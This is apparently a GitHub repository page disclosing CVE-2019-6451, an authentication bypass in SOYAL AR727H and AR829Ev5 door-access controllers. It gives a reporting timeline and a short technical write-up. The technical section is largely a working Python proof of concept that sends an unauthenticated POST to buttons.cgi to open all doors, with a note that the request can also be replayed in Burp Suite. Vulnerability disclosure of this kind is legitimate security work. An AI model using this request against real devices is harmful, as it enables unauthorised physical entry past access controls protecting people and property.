Skip to content
master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
CVEs/CVE-2019-6451/
CVEs/CVE-2019-6451/

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
 
 
 
 

CVE-2019-6451

Timeline

  • January 15, 2019 reported to SOAYL
  • January 15, 2019 arranged meeting time for further discussions
  • January 16, 2019 CVE assigned

Affected Products

  • SOYAL-AR727H
  • SOYAL-AR829Ev5

Technical Details

On thoses devices, all CGI programs allow unauthenticated POST access.

if you know the proper parameters and format, anyone can make it work

like open the door or insert new account on the device

In the Direct Control tab, you can control the door directly.

replay with Burpsuite or send it by python code below

import requests

response = requests.post('http://IP/buttons.cgi', data={'btn_Node': '255',
    'btnOpenAllPulse': '+Action+',
    'btn_nameDI0': 'DI0',
    'btn_nameDI1': 'DI1',
    'btn_nameDI2': 'DI2',
    'btn_nameDI3': 'DI3',
    'btn_nameDO0': 'RelayOutput0',
    'delayDO0':'0',
    'btn_nameDO1': 'DO1',
    'delayDO1': '0',
    'btn_nameDO2': 'DO2',
    'delayDO2': '0',
    'btn_nameDO3': 'DO3',
    'delayDO3': '0'})

OPEN SESAME !!!

Discoverer